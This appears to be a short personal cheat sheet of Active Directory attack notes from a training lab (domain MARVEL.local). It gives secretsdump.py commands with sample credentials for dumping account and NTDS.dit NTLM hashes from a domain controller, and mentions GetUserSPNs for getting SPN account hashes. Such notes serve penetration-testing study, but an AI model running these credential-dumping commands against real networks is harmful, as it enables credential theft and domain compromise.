JJSimo/Notes/cheet.md

 #### secretsdump
 tools for looking for hash for accounts `secretsdump.py MARVEL.local/fcastle:'Password1'@172.16.214.130`

+dumping the NTDS.dit:   (that contains all the hashes) `secretsdump.py MARVEL.local/hawkeye:'Password1@'@172.16.214.128 -just-dc-ntlm` `172.16.214.128` -->  Domain Controller IP
+you must have access an admin account

 ####  GetUserSPNs
 Can be used to obtain a password hash for user accounts that have an SPN (service principal name)